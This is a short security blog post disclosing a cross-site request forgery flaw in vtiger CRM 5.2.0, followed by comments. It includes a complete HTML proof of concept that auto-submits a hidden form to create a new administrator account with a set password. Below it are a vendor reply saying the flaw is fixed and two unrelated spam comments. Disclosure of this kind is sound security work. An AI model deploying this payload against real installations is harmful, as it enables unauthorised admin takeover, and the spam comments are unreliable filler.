This site is soon to be deprecated by http://www.johnleitch.net

Friday, May 21, 2010

vtiger CRM 5.2.0 XSRF

A cross-site request forgery vunlerability in vtiger CRM 5.2.0 can be exploited to create an new admin. The form values can also be sent via GET request, but the resulting user does not have admin privileges.

PoC:
<html>
<body onload="document.forms[0].submit()">
<form name="EditView" method="post" action="http://localhost/index.php">
<input type="hidden" name="module" value="Users" />
<input type="hidden" name="mode" value="create" />
<input type="hidden" name="action" value="Save" />
<input type="hidden" name="user_name" value="new_user" />
<input type="hidden" name="is_admin" value="on" />
<input type="hidden" name="user_password" value="new_password" />
<input type="hidden" name="confirm_password" value="new_password" />
<input type="hidden" name="email1" value="test@test.com" />
<input type="hidden" name="status" value="Active" />
</form>
</body>
</html>

4 comments:

  1. Hi

    We have fixed this issue, test this with vtiger CRM 5.2.0 RC which will be out in 5-6 days.

    ReplyDelete
  2. The bench press itself is not used for muscle hypertrophy (growth). The special exercises serve two critical purposes: the develop-ment of strength in individual muscle groups and an increase in muscular size, which helps increase leverage in the bench and squat.

    cruiseshipjobs

    Cashmere Pashmina

    ReplyDelete
  3. The starch source in a beer provides the fermentable material in a beer and is a key determinant of the character of the beer. The most common starch source used in beer is malted grain. Grain is malted by soaking it in water, allowing it to begin germination, and then drying the partially germinated grain in a kiln.

    on hold players
    non profit fundraiser

    ReplyDelete